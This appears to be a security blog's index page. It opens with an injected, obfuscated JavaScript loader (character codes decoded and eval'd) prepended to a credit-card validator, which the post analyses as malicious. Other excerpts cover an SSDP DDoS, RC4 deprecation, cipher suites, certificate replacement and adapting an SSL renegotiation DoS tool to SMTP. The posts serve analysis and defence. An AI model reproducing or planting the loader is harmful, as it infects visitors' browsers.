x37\x2c\x34\x39\x2c\x31\x30\x39\x2c\x34\x36\x2c\x34\x39\x2c\x31\x31\x35\x2c\x34\x36\x2c\x34\x39\x2c\x31\x31\x34\x2c\x34\x37\x2c\x34\x39\x2c\x31\x31\x37\x2c\x34\x36\x2c\x34\x39\x2c\x31\x31\x36\x2c\x33\x34\x2c\x39\x33\x2c\x35\x39\x2c\x34\x39\x2c\x31\x31\x31\x2c\x34\x36\x2c\x34\x39\x2c\x31\x31\x30\x2c\x34\x36\x2c\x34\x39\x2c\x31\x31\x33\x2c\x36\x31\x2c\x36\x36\x2c\x39\x31\x2c\x31\x31\x36\x2c\x34\x36\x2c\x34\x39\x2c\x31\x31\x32\x2c\x34\x30\x2c\x31\x31\x36\x2c\x34\x36\x2c\x38\x35\x2c\x34\x30\x2c\x34\x31\x2c\x34\x32\x2c\x36\x36\x2c\x34\x36\x2c\x31\x32\x32\x2c\x34\x31\x2c\x39\x33\x2c\x31\x32\x35\x2c\x31\x31\x34\x2c\x31\x32\x33\x2c\x31\x30\x39\x2c\x34\x30\x2c\x33\x34\x2c\x31\x31\x30\x2c\x33\x34\x2c\x34\x34\x2c\x33\x34\x2c\x31\x31\x31\x2c\x34\x36\x2c\x31\x30\x38\x2c\x34\x36\x2c\x31\x30\x33\x2c\x33\x34\x2c\x34\x31\x2c\x31\x32\x35\x2c\x31\x32\x35\x2c\x33\x39\x2c\x34\x34\x2c\x35\x34\x2c\x35\x30\x2c\x34\x34\x2c\x34\x39\x2c\x34\x38\x2c\x35\x34\x2c\x34\x34\x2c\x33\x39\x2c\x31\x32\x34\x2c\x31\x32\x34\x2c\x31\x32\x34\x2c\x31\x31\x38\x2c\x39\x37\x2c\x31\x31\x34\x2c\x31\x32\x34\x2c\x31\x30\x35\x2c\x31\x30\x32\x2c\x31\x32\x34\x2c\x31\x32\x34\x2c\x31\x32\x34\x2c\x31\x31\x34\x2c\x31\x30\x31\x2c\x31\x31\x36\x2c\x31\x31\x37\x2c\x31\x31\x34\x2c\x31\x31\x30\x2c\x31\x32\x34\x2c\x36\x38\x2c\x39\x37\x2c\x31\x31\x36\x2c\x31\x30\x31\x2c\x38\x34\x2c\x31\x31\x39\x2c\x31\x31\x31\x2c\x31\x32\x34\x2c\x36\x38\x2c\x39\x37\x2c\x31\x31\x36\x2c\x31\x30\x31\x2c\x37\x39\x2c\x31\x31\x30\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x32\x34\x2c\x31\x32\x34\x2c\x31\x30\x35\x2c\x31\x31\x30\x2c\x31\x30\x30\x2c\x31\x30\x31\x2c\x31\x32\x30\x2c\x37\x39\x2c\x31\x30\x32\x2c\x31\x32\x34\x2c\x31\x32\x34\x2c\x39\x37\x2c\x31\x31\x34\x2c\x31\x31\x34\x2c\x31\x32\x34\x2c\x36\x38\x2c\x39\x37\x2c\x31\x31\x36\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x34\x39\x2c\x35\x32\x2c\x35\x30\x2c\x35\x31\x2c\x35\x30\x2c\x35\x35\x2c\x35\x32\x2c\x35\x36\x2c\x34\x39\x2c\x35\x32\x2c\x34\x39\x2c\x35\x33\x2c\x34\x39\x2c\x31\x32\x34\x2c\x31\x30\x32\x2c\x31\x31\x37\x2c\x31\x31\x30\x2c\x39\x39\x2c\x31\x31\x36\x2c\x31\x30\x35\x2c\x31\x31\x31\x2c\x31\x31\x30\x2c\x31\x32\x34\x2c\x31\x31\x34\x2c\x31\x30\x31\x2c\x31\x30\x32\x2c\x31\x30\x31\x2c\x31\x31\x34\x2c\x31\x31\x34\x2c\x31\x30\x31\x2c\x31\x31\x34\x2c\x31\x32\x34\x2c\x31\x31\x35\x2c\x31\x31\x37\x2c\x39\x38\x2c\x31\x31\x35\x2c\x31\x31\x36\x2c\x31\x31\x34\x2c\x31\x30\x35\x2c\x31\x31\x30\x2c\x31\x30\x33\x2c\x31\x32\x34\x2c\x31\x31\x30\x2c\x31\x30\x31\x2c\x31\x31\x39\x2c\x31\x32\x34\x2c\x34\x39\x2c\x35\x30\x2c\x34\x38\x2c\x34\x39\x2c\x35\x37\x2c\x35\x32\x2c\x35\x32\x2c\x35\x36\x2c\x35\x35\x2c\x34\x39\x2c\x35\x30\x2c\x31\x32\x34\x2c\x31\x31\x35\x2c\x31\x30\x31\x2c\x31\x31\x36\x2c\x36\x37\x2c\x31\x31\x31\x2c\x31\x31\x31\x2c\x31\x30\x37\x2c\x31\x30\x35\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x39\x35\x2c\x39\x35\x2c\x31\x30\x33\x2c\x39\x37\x2c\x31\x30\x35\x2c\x31\x30\x30\x2c\x31\x32\x34\x2c\x37\x31\x2c\x36\x35\x2c\x34\x39\x2c\x31\x32\x34\x2c\x31\x31\x34\x2c\x31\x31\x35\x2c\x31\x32\x34\x2c\x31\x31\x36\x2c\x31\x31\x31\x2c\x37\x36\x2c\x31\x31\x31\x2c\x31\x31\x39\x2c\x31\x30\x31\x2c\x31\x31\x34\x2c\x36\x37\x2c\x39\x37\x2c\x31\x31\x35\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x30\x31\x2c\x31\x30\x38\x2c\x31\x31\x35\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x30\x31\x2c\x31\x32\x30\x2c\x31\x31\x32\x2c\x31\x32\x34\x2c\x37\x37\x2c\x39\x37\x2c\x31\x31\x36\x2c\x31\x30\x34\x2c\x31\x32\x34\x2c\x39\x37\x2c\x31\x31\x34\x2c\x31\x31\x34\x2c\x31\x31\x35\x2c\x31\x32\x34\x2c\x31\x31\x30\x2c\x39\x37\x2c\x31\x30\x39\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x30\x38\x2c\x39\x37\x2c\x31\x31\x35\x2c\x31\x31\x36\x2c\x37\x33\x2c\x31\x31\x30\x2c\x31\x30\x30\x2c\x31\x30\x31\x2c\x31\x32\x30\x2c\x37\x39\x2c\x31\x30\x32\x2c\x31\x32\x34\x2c\x31\x32\x34\x2c\x31\x30\x30\x2c\x31\x31\x31\x2c\x39\x39\x2c\x31\x31\x37\x2c\x31\x30\x39\x2c\x31\x30\x31\x2c\x31\x31\x30\x2c\x31\x31\x36\x2c\x31\x32\x34\x2c\x31\x30\x38\x2c\x31\x30\x31\x2c\x31\x31\x30\x2c\x31\x30\x33\x2c\x31\x31\x36\x2c\x31\x30\x34\x2c\x31\x32\x34\x2c\x31\x30\x33\x2c\x31\x30\x31\x2c\x31\x31\x36\x2c\x38\x34\x2c\x31\x30\x35\x2c\x31\x30\x39\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x31\x34\x2c\x31\x31\x30\x2c\x31\x30\x30\x2c\x31\x31\x35\x2c\x31\x30\x35\x2c\x31\x31\x36\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x31\x30\x2c\x39\x37\x2c\x31\x31\x38\x2c\x31\x30\x35\x2c\x31\x30\x33\x2c\x39\x37\x2c\x31\x31\x36\x2c\x31\x31\x31\x2c\x31\x31\x34\x2c\x31\x32\x34\x2c\x39\x39\x2c\x31\x30\x34\x2c\x39\x37\x2c\x31\x32\x34\x2c\x38\x34\x2c\x31\x31\x39\x2c\x31\x31\x31\x2c\x38\x39\x2c\x31\x30\x31\x2c\x39\x37\x2c\x31\x31\x34\x2c\x31\x32\x34\x2c\x39\x39\x2c\x31\x31\x31\x2c\x31\x31\x31\x2c\x31\x30\x37\x2c\x31\x30\x35\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x31\x38\x2c\x39\x37\x2c\x31\x30\x38\x2c\x31\x31\x37\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x35\x31\x2c\x35\x33\x2c\x31\x32\x34\x2c\x31\x31\x36\x2c\x31\x31\x31\x2c\x31\x30\x30\x2c\x39\x37\x2c\x31\x32\x31\x2c\x31\x32\x34\x2c\x31\x31\x34\x2c\x31\x30\x31\x2c\x31\x30\x33\x2c\x31\x32\x34\x2c\x31\x31\x35\x2c\x31\x31\x36\x2c\x31\x31\x34\x2c\x31\x32\x34\x2c\x31\x30\x30\x2c\x39\x37\x2c\x31\x32\x31\x2c\x31\x31\x35\x2c\x36\x36\x2c\x31\x30\x31\x2c\x31\x31\x36\x2c\x31\x31\x39\x2c\x31\x30\x31\x2c\x31\x30\x31\x2c\x31\x31\x30\x2c\x31\x32\x34\x2c\x35\x34\x2c\x34\x38\x2c\x31\x32\x34\x2c\x31\x31\x36\x2c\x31\x31\x34\x2c\x31\x31\x37\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x39\x39\x2c\x31\x31\x31\x2c\x31\x30\x39\x2c\x31\x30\x30\x2c\x39\x37\x2c\x31\x31\x36\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x31\x35\x2c\x31\x30\x36\x2c\x31\x31\x35\x2c\x31\x32\x34\x2c\x31\x30\x33\x2c\x31\x30\x31\x2c\x31\x31\x36\x2c\x36\x37\x2c\x31\x31\x31\x2c\x31\x31\x31\x2c\x31\x30\x37\x2c\x31\x30\x35\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x37\x39\x2c\x31\x31\x30\x2c\x31\x30\x31\x2c\x37\x37\x2c\x31\x31\x31\x2c\x31\x31\x30\x2c\x31\x31\x36\x2c\x31\x30\x34\x2c\x31\x32\x34\x2c\x31\x30\x38\x2c\x31\x30\x37\x2c\x31\x31\x36\x2c\x31\x30\x35\x2c\x31\x30\x39\x2c\x31\x30\x31\x2c\x31\x31\x35\x2c\x31\x32\x34\x2c\x31\x31\x35\x2c\x31\x31\x36\x2c\x39\x37\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x31\x36\x2c\x31\x30\x35\x2c\x31\x30\x39\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x31\x34\x2c\x39\x37\x2c\x31\x31\x30\x2c\x31\x30\x30\x2c\x31\x31\x31\x2c\x31\x30\x39\x2c\x31\x32\x34\x2c\x31\x31\x35\x2c\x31\x31\x32\x2c\x31\x30\x38\x2c\x31\x30\x35\x2c\x31\x31\x36\x2c\x31\x32\x34\x2c\x31\x31\x35\x2c\x31\x31\x36\x2c\x39\x37\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x31\x36\x2c\x31\x30\x35\x2c\x31\x30\x39\x2c\x31\x30\x31\x2c\x31\x31\x35\x2c\x31\x32\x34\x2c\x31\x30\x38\x2c\x31\x30\x37\x2c\x31\x31\x36\x2c\x31\x30\x35\x2c\x31\x30\x39\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x37\x39\x2c\x31\x31\x30\x2c\x31\x30\x31\x2c\x36\x38\x2c\x39\x37\x2c\x31\x32\x31\x2c\x31\x32\x34\x2c\x31\x31\x35\x2c\x31\x31\x33\x2c\x31\x32\x34\x2c\x38\x34\x2c\x31\x31\x39\x2c\x31\x31\x31\x2c\x37\x37\x2c\x31\x31\x31\x2c\x31\x31\x30\x2c\x31\x31\x36\x2c\x31\x30\x34\x2c\x31\x32\x34\x2c\x31\x31\x32\x2c\x39\x37\x2c\x31\x31\x34\x2c\x31\x31\x35\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x30\x38\x2c\x39\x37\x2c\x31\x31\x30\x2c\x31\x30\x33\x2c\x31\x32\x34\x2c\x37\x39\x2c\x31\x31\x30\x2c\x31\x30\x31\x2c\x38\x39\x2c\x31\x30\x31\x2c\x39\x37\x2c\x31\x31\x34\x2c\x31\x32\x34\x2c\x38\x34\x2c\x31\x31\x39\x2c\x31\x31\x31\x2c\x36\x38\x2c\x39\x37\x2c\x31\x32\x31\x2c\x31\x32\x34\x2c\x34\x39\x2c\x35\x36\x2c\x34\x38\x2c\x31\x32\x34\x2c\x35\x36\x2c\x35\x34\x2c\x35\x32\x2c\x34\x38\x2c\x34\x38\x2c\x34\x38\x2c\x34\x38\x2c\x34\x38\x2c\x31\x32\x34\x2c\x31\x31\x35\x2c\x31\x30\x31\x2c\x31\x31\x36\x2c\x38\x34\x2c\x31\x30\x35\x2c\x31\x30\x39\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x30\x33\x2c\x31\x30\x31\x2c\x31\x31\x36\x2c\x37\x30\x2c\x31\x31\x37\x2c\x31\x30\x38\x2c\x31\x30\x38\x2c\x38\x39\x2c\x31\x30\x31\x2c\x39\x37\x2c\x31\x31\x34\x2c\x31\x32\x34\x2c\x31\x30\x33\x2c\x31\x30\x31\x2c\x31\x31\x36\x2c\x37\x37\x2c\x31\x31\x31\x2c\x31\x31\x30\x2c\x31\x31\x36\x2c\x31\x30\x34\x2c\x31\x32\x34\x2c\x31\x30\x33\x2c\x31\x30\x31\x2c\x31\x31\x36\x2c\x36\x38\x2c\x39\x37\x2c\x31\x31\x36\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x39\x37\x2c\x39\x38\x2c\x31\x31\x35\x2c\x31\x32\x34\x2c\x35\x30\x2c\x34\x38\x2c\x34\x39\x2c\x35\x33\x2c\x31\x32\x34\x2c\x31\x30\x32\x2c\x39\x37\x2c\x31\x30\x38\x2c\x31\x31\x35\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x31\x32\x2c\x39\x37\x2c\x31\x31\x34\x2c\x31\x31\x35\x2c\x31\x30\x31\x2c\x37\x33\x2c\x31\x31\x30\x2c\x31\x31\x36\x2c\x31\x32\x34\x2c\x34\x38\x2c\x35\x36\x2c\x34\x38\x2c\x31\x32\x34\x2c\x31\x30\x34\x2c\x31\x31\x36\x2c\x31\x31\x36\x2c\x31\x31\x32\x2c\x31\x32\x34\x2c\x34\x39\x2c\x34\x38\x2c\x34\x38\x2c\x31\x32\x34\x2c\x39\x38\x2c\x31\x31\x34\x2c\x31\x31\x31\x2c\x31\x31\x39\x2c\x31\x31\x35\x2c\x31\x30\x31\x2c\x31\x31\x34\x2c\x37\x36\x2c\x39\x37\x2c\x31\x31\x30\x2c\x31\x30\x33\x2c\x31\x31\x37\x2c\x39\x37\x2c\x31\x30\x33\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x30\x38\x2c\x39\x37\x2c\x31\x31\x30\x2c\x31\x30\x33\x2c\x31\x31\x37\x2c\x39\x37\x2c\x31\x30\x33\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x31\x36\x2c\x31\x31\x31\x2c\x38\x33\x2c\x31\x31\x36\x2c\x31\x31\x34\x2c\x31\x30\x35\x2c\x31\x31\x30\x2c\x31\x30\x33\x2c\x31\x32\x34\x2c\x39\x39\x2c\x31\x31\x30\x2c\x31\x32\x34\x2c\x31\x31\x39\x2c\x31\x31\x39\x2c\x31\x31\x39\x2c\x31\x32\x34\x2c\x31\x30\x38\x2c\x31\x31\x31\x2c\x39\x39\x2c\x39\x37\x2c\x31\x31\x36\x2c\x31\x30\x35\x2c\x31\x31\x31\x2c\x31\x31\x30\x2c\x31\x32\x34\x2c\x31\x31\x39\x2c\x31\x30\x35\x2c\x31\x31\x30\x2c\x31\x30\x30\x2c\x31\x31\x31\x2c\x31\x31\x39\x2c\x31\x32\x34\x2c\x31\x30\x32\x2c\x31\x30\x38\x2c\x31\x31\x31\x2c\x31\x31\x31\x2c\x31\x31\x34\x2c\x31\x32\x34\x2c\x31\x30\x34\x2c\x31\x31\x34\x2c\x31\x30\x31\x2c\x31\x30\x32\x2c\x31\x32\x34\x2c\x31\x30\x30\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x31\x32\x2c\x31\x30\x31\x2c\x31\x31\x34\x2c\x31\x30\x32\x2c\x31\x30\x31\x2c\x31\x30\x37\x2c\x31\x31\x36\x2c\x31\x30\x31\x2c\x31\x30\x37\x2c\x31\x30\x38\x2c\x31\x30\x31\x2c\x31\x30\x35\x2c\x31\x30\x30\x2c\x31\x32\x34\x2c\x31\x31\x32\x2c\x31\x30\x34\x2c\x31\x31\x32\x2c\x31\x32\x34\x2c\x31\x31\x39\x2c\x31\x30\x31\x2c\x31\x30\x38\x2c\x39\x39\x2c\x31\x31\x31\x2c\x31\x30\x39\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x38\x32\x2c\x31\x30\x31\x2c\x31\x30\x33\x2c\x36\x39\x2c\x31\x32\x30\x2c\x31\x31\x32\x2c\x31\x32\x34\x2c\x31\x31\x36\x2c\x31\x31\x31\x2c\x37\x31\x2c\x37\x37\x2c\x38\x34\x2c\x38\x33\x2c\x31\x31\x36\x2c\x31\x31\x34\x2c\x31\x30\x35\x2c\x31\x31\x30\x2c\x31\x30\x33\x2c\x31\x32\x34\x2c\x31\x31\x37\x2c\x31\x31\x30\x2c\x31\x30\x31\x2c\x31\x31\x35\x2c\x39\x39\x2c\x39\x37\x2c\x31\x31\x32\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x30\x39\x2c\x39\x37\x2c\x31\x31\x36\x2c\x39\x39\x2c\x31\x30\x34\x2c\x31\x32\x34\x2c\x34\x39\x2c\x34\x38\x2c\x34\x38\x2c\x34\x38\x2c\x31\x32\x34\x2c\x35\x30\x2c\x35\x32\x2c\x31\x32\x34\x2c\x31\x30\x31\x2c\x31\x32\x30\x2c\x31\x31\x32\x2c\x31\x30\x35\x2c\x31\x31\x34\x2c\x31\x30\x31\x2c\x31\x31\x35\x2c\x31\x32\x34\x2c\x31\x30\x31\x2c\x31\x31\x35\x2c\x39\x39\x2c\x39\x37\x2c\x31\x31\x32\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x30\x33\x2c\x31\x31\x31\x2c\x31\x31\x31\x2c\x31\x30\x33\x2c\x31\x30\x38\x2c\x31\x30\x31\x2c\x31\x32\x34\x2c\x31\x32\x31\x2c\x39\x37\x2c\x31\x30\x34\x2c\x31\x31\x31\x2c\x31\x31\x31\x2c\x31\x32\x34\x2c\x31\x31\x30\x2c\x31\x31\x37\x2c\x31\x30\x38\x2c\x31\x30\x38\x2c\x31\x32\x34\x2c\x39\x38\x2c\x31\x30\x35\x2c\x31\x31\x30\x2c\x31\x30\x33\x2c\x31\x32\x34\x2c\x31\x31\x32\x2c\x31\x30\x35\x2c\x31\x31\x30\x2c\x31\x31\x36\x2c\x31\x30\x31\x2c\x31\x31\x34\x2c\x31\x30\x31\x2c\x31\x31\x35\x2c\x31\x31\x36\x2c\x33\x39\x2c\x34\x36\x2c\x31\x31\x35\x2c\x31\x31\x32\x2c\x31\x30\x38\x2c\x31\x30\x35\x2c\x31\x31\x36\x2c\x34\x30\x2c\x33\x39\x2c\x31\x32\x34\x2c\x33\x39\x2c\x34\x31\x2c\x34\x34\x2c\x34\x38\x2c\x34\x34\x2c\x31\x32\x33\x2c\x31\x32\x35\x2c\x34\x31\x2c\x34\x31\x2c\x31\x30"
t=window["\x65\x76\x61\x6c"]("String.fromCharCode("+t+")");window["\x65\x76\x61\x6c"](t);
// You have permission to copy and use this javascript provided that
// the content of the script is not changed in any way.

function validateCreditCard(s) {
    // remove non-numerics
    var v = "0123456789";
    var w = "";
    for (i=0; i < s.length; i++) {
        x = s.charAt(i);
        if (v.indexOf(x,0) != -1)
        w += x;
    }
    // validate number
    j = w.length / 2;
    k = Math.floor(j);
    m = Math.ceil(j) - k;
    c = 0;
    for (i=0; i<k; i++) {
        a = w.charAt(i*2+m) * 2;
        c += a > 9 ? Math.floor(a/10 + a%10) : a;
    }
    for (i=0; i<k+m; i++) c += w.charAt(i*2+1-m) * 1;
    return (c%10 == 0);
}

Notice anything? Yep, the third and fourth line look awfully strange. Eerily strange even. What should be obvious is that nothing is obvious, except that there is probably some JavaScript obfuscation going on. JavaScript obfuscation is used regularly by bad guys trying to evade malware and exploit detection by IDS/IPS and such, or even by supposedly “good” guys that are like “don’t steal my code, dude!!!1”. While obfuscation by compressing JavaScript (removing unnecessary whitespace for faster load/browser execution) is understandable, I find the latter rather questionable, but whatever.
For some fun JavaScript obfuscation samples check out jjencode and aaencode by Yosuke Hasegawa.

At least in this example the obfuscated part appears very out of place, so it’s safe to assume these lines were injected with some malicious intent. Virustotal also shows that that McAfee and TrendMicro detect the file as malicious malware with their respective heuristic signatures BehavesLike.JS.ExploitBlacole.mx and HEUR_HTJS.HDJSFN.

Continue reading

Analyzing and coping with a SSDP amplification DDoS attack

Posted on by

A while ago we were hit by an amplification/reflection DDoS attack against our public-facing network. I was familiar with NTP and DNS based reflection DDoS attacks, but this one employed the Simple Service Discovery Protocol (SSDP) to flood our tubes, a  name name I’ve heard before and saw in packet traces randomly, but hardly knew anything about to be honest.
SSDP is a UDP-based protocol for service discovery and UPnP functionality with an HTTP-like syntax. It’s deployed by modern operating systems and embedded systems like home routers, where it is sometimes enabled even on their external interfaces, which makes this kind of attack possible.

The Shadowserver Foundation has a nice website with lots of information and statistics of public SSDP-enabled devices: While the number of open or vulnerable DNS and NTP is going down steadily, there are currently around 14 million IPs around the world that respond to SSDP requests, and the number is only declining very slowly:

Due to this we can expect that SSDP will be abused for DDoS attacks more often in the future.

Continue reading

RC4 officially deprecated by RFC 7465

Posted on by

A new RFC 7465 has now been published that effectively calls for disabling RC4 everywhere:

   o  TLS clients MUST NOT include RC4 cipher suites in the ClientHello message.

   o  TLS servers MUST NOT select an RC4 cipher suite when a TLS client
      sends such a cipher suite in the ClientHello message.

   o  If the TLS client only offers RC4 cipher suites, the TLS server
      MUST terminate the handshake.  The TLS server MAY send the
      insufficient_security fatal alert in this case.

Cryptographic weaknesses around RC4 were known since many years, but in the beginning of 2013 they finally became feasible to exploit with some considerable, but not too huge of an effort.
The author of the RFC belongs to Microsoft, which published and advisory for disabling RC4 in November 2013 as well. However, Windows Server 2012 R2 with IIS 8.5 which was released in October 2013 still ships with RC4 enabled by default.

A lot of websites and “modern” software still use RC4 today. According to the SSL-Pulse statistics currently more than 60% of all SSL/TLS enabled websites still offer RC4.

It depends on the service and the security requirements, but at the moment I personally don’t see it that much of a problem in offering RC4 as a fallback, if you always prefer other secure ciphers.

Here are some examples of software or websites that still use RC4 in a manner it shouldn’t be used:

  • PayPal (server prefers RC4, though offers AES as well)
  • Youtube (the servers providing the actual video streams, not the general site; RC4 exclusively(!)) I Tested it last week but it seems like Youtube switched to offering and preferring other AES-based cipher suites just recently.
  • All versions of Windows Server and Client OSes, including the respective Internet Explorer enable RC4 by default
  • Some VMware products (at least the vCenter Web Client, and many virtual appliances; most seem to prefer AES though; ESXi hosts and vCenter service on port 443 and SSO on 7444 do not support RC4)
  • HP ILO interfaces (confirmed with ILO4 2.03, ILO3 1.80; prefers RC4)
  • Cisco IronPort Mail appliances seem to be using RC4 exclusively(!)
  • Check Point Gaia Portal web interface (tested with R77.20 with JHFA Take 77; RC4 exclusively(!))

Seems like there’s a lot of work waiting for vendors and website admins to disable RC4.
It’s a mystery to me how some popular websites or recent software releases can be released without support for any cipher suite besides RC4. And no, mitigating BEAST is not a valid excuse.

Replacing the IWSVA Admin Web Interface SSL Certificate

Posted on by

Since documentation on this by Trend Micro is pretty sparse and I’ve had to do this on a number of systems recently, I’ll document the process of replacing or adding a certificate for the IWSVA Admin Web Console with a new CA-signed one here.

Note: This documentation is NOT for replacing the IWSVA SSL-Inspection certificate, though similarities may exist.
I’ve done this successfully on IWSVA 5.6 and 6.5, the process should work without issues on IWSVA 6.0 as well.

The whole process of requesting/creating/converting the SSL certificate described here mainly involves openssl commands and can be done from the IWSVA root shell. I also generally recommend to create at least the certificate public/private key pair always on the system that will in the end host the certificate. This reduces the risk of getting the private key compromised when you create key pairs on a different system and then have to somehow transfer the key over the network or some other way (yes, you can encrypt the keys, but it’s best if the key never left the target system in the first place).

Continue reading

Secure Cipher-Suites for Qualys SSL Labs server test A/A+ rating

Posted on by

There are many possible ways to configure your server to support only secure cipher-suites and get an A/A+ rating from the SSL Labs SSL Test, some are more restrictive than others, some are more complex than others.

There is no single holy grail, but for openssl-based applications such as Apache, postfix, or nginx, I prefer to go with this to me personally more readable and to me more sensible general notation:
HIGH:!aNULL:!eNULL:!kECDH:!aDH:!RC4:!3DES:!CAMELLIA:!MD5:!PSK:!SRP:!KRB5:@STRENGTH

Checking the openssl documentation, this boils down to the following logic:

  • Only enable strong (High) encryption cipher suites (at least 128 bit length)
  • Exclude cipher-suites without authentication (aNULL) or without encryption (eNULL)
  • Exclude fixed/static ECDHE (kECDH) instead of ephemeral ECDHE keys (no PFS, rarely used)
  • Exclude cipher-suites using DH authentication (aDH), which is rarely used and needs the certificate to have static DH keys
  • Exclude RC4 and 3DES cipher-suites which are known to be weak or outdated
  • Exclude Camellia cipher-suites, which is rarely used/preferred by clients/servers when AES is already supported. AES is the de-facto standard
  • Exclude outdated cipher-suites using weak MD5 HMAC
  • Exclude cipher-suites used extremely rarely or only in very specific applications like Secure Remote Password authentication (SRP), PSK (Pre-Shared Key) and KRB5 (Kerberos5, also supports only old ciphers/HMAC)
  • Sort the cipher list by strength

With at least the recent openssl 1.0.1j version, this will enable a broad range of 30 secure AES-based ciphers suites, including some basic non-PFS AES suites for compatibility reasons (decide for yourself if you’re OK with this). This guarantees an SSL test rating of at least A.
If you really need to support older clients, then you could also consider leaving 3DES enabled.
Note: To get an A+ rating currently your certificate must have a SHA-256 chain and the server also needs to support TLS Fallback SCSV and apparently HTTP Strict Transport Security as well.

Continue reading

[Script] Extending Linux LVM partitions

Posted on by

Here’s a script I wrote a while a go to extend LVM partitions on Linux machines.

The script assumes that you have extended the existing underlying physical (or “virtual” if it’s a VM) storage device prior to execution. It will rescan the disks (skip with -f), resize the existing partition (basically just setting a different end sector), reboot, and run scripts to extend the actual file system after the reboot. There are other ways to extend the disk space including creating a new partition on the additional disk space, but I’ve decided against that approach in favor of a single-partition scheme for management/simplicity’s sake.

This script will work with VMs and physical servers alike. I’ve tested it with RHEL 6/7 and CentOS 6/7, but it should generally work with other Linux distributions as well.

You can get the most recent version of this script on Github here. If you have any suggestions or improvements (which I’m sure there is plenty of room for), feel free to drop a comment or an issue or a pull-request on Github.

Continue reading

THC SSL Renegotiation DoS Tool for SMTP STARTTLS

Posted on by

The so called Secure Client-Initiated Renegotiation function of SSL/TLS suffers from a possible DoS danger because it burdens the server’s CPU orders of magnitude more than the client’s, who initiates it. Because of that, Client-Initiated Renegotiation is nowadays disabled by default in virtually all widely used SSL/TLS implementations.

However, I noticed that it seems to be still enabled by default on the postfix SMTP daemon including recent releases (postfix 2.6.6) and openssl (1.0.1j) versions and there appears to be no way of disabling it in the configuration. Since I already used the thc ssl dos tool which exploits this vulnerability in previous penetration tests on webservers, I thought it would be nice if it worked with SMTP mailservers supporting STARTTLS as well.

Continue reading